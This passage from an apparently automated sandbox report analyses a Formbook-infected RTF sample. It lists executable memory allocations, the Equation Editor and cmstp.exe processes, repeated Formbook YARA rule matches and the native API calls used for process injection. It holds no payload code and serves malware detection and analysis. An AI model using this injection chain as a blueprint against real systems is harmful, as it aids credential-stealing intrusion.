          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Memory allocated: 771D0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Memory allocated: 771D0000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 771D0000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 771D0000 page execute and read and write
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.881171114.0000000008CBE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: twbcaze.exe PID: 3164, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: twbcaze.exe PID: 3172, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmstp.exe PID: 3216, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: String function: 0084DF5C appears 137 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: String function: 008BF970 appears 84 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: String function: 0089373B appears 253 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: String function: 0040F880 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: String function: 00893F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: String function: 0084E2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 01ECDF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 01F3F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 01ECE2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 01F1373B appears 253 times
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 01F13F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0041A320 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0041A3D0 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0041A450 NtClose
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0041A500 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0041A3CA NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0041A44A NtClose
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_008400C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_00840078 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F9F0 NtClose,LdrInitializeThunk,7_2_0083F9F0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F900 NtReadFile,LdrInitializeThunk,7_2_0083F900
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0083FAD0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0083FAE8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0083FBB8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0083FB68
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_0083FC90
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0083FC60
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FD8C NtDelayExecution,LdrInitializeThunk,7_2_0083FD8C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0083FDC0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_0083FEA0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0083FED0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FFB4 NtCreateSection,LdrInitializeThunk,7_2_0083FFB4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00840060 NtQuerySection,7_2_00840060
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008401D4 NtSetValueKey,7_2_008401D4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084010C NtOpenDirectoryObject,7_2_0084010C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008407AC NtCreateMutant,7_2_008407AC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00840C40 NtGetContextThread,7_2_00840C40
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008410D0 NtOpenProcessToken,7_2_008410D0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00841148 NtOpenThread,7_2_00841148
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F8CC NtWaitForSingleObject,7_2_0083F8CC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00841930 NtSetContextThread,7_2_00841930
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F938 NtWriteFile,7_2_0083F938
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FAB8 NtQueryValueKey,7_2_0083FAB8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FA20 NtQueryInformationFile,7_2_0083FA20
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FA50 NtEnumerateValueKey,7_2_0083FA50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FBE8 NtQueryVirtualMemory,7_2_0083FBE8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FB50 NtCreateKey,7_2_0083FB50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC30 NtOpenProcess,7_2_0083FC30
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC48 NtSetInformationFile,7_2_0083FC48
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00841D80 NtSuspendThread,7_2_00841D80
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FD5C NtEnumerateKey,7_2_0083FD5C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FE24 NtWriteVirtualMemory,7_2_0083FE24
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FFFC NtCreateProcessEx,7_2_0083FFFC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FF34 NtQueueApcThread,7_2_0083FF34
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA7E12 NtProtectVirtualMemory,8_2_08CA7E12
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA6232 NtCreateFile,8_2_08CA6232
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA7E0A NtProtectVirtualMemory,8_2_08CA7E0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC00C4 NtCreateFile,LdrInitializeThunk,9_2_01EC00C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC07AC NtCreateMutant,LdrInitializeThunk,9_2_01EC07AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF9F0 NtClose,LdrInitializeThunk,9_2_01EBF9F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF900 NtReadFile,LdrInitializeThunk,9_2_01EBF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_01EBFBB8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01EBFB68
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFB50 NtCreateKey,LdrInitializeThunk,9_2_01EBFB50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_01EBFAE8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01EBFAD0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,9_2_01EBFAB8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01EBFDC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,9_2_01EBFD8C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,9_2_01EBFC60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,9_2_01EBFFB4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01EBFED0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC01D4 NtSetValueKey,9_2_01EC01D4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC010C NtOpenDirectoryObject,9_2_01EC010C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0060 NtQuerySection,9_2_01EC0060
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0078 NtResumeThread,9_2_01EC0078
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0048 NtProtectVirtualMemory,9_2_01EC0048
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0C40 NtGetContextThread,9_2_01EC0C40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC1148 NtOpenThread,9_2_01EC1148
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC10D0 NtOpenProcessToken,9_2_01EC10D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF938 NtWriteFile,9_2_01EBF938
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC1930 NtSetContextThread,9_2_01EC1930
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF8CC NtWaitForSingleObject,9_2_01EBF8CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFBE8 NtQueryVirtualMemory,9_2_01EBFBE8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFA50 NtEnumerateValueKey,9_2_01EBFA50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFA20 NtQueryInformationFile,9_2_01EBFA20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC1D80 NtSuspendThread,9_2_01EC1D80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFD5C NtEnumerateKey,9_2_01EBFD5C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC90 NtUnmapViewOfSection,9_2_01EBFC90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC48 NtSetInformationFile,9_2_01EBFC48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC30 NtOpenProcess,9_2_01EBFC30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFFFC NtCreateProcessEx,9_2_01EBFFFC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFF34 NtQueueApcThread,9_2_01EBFF34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFEA0 NtReadVirtualMemory,9_2_01EBFEA0
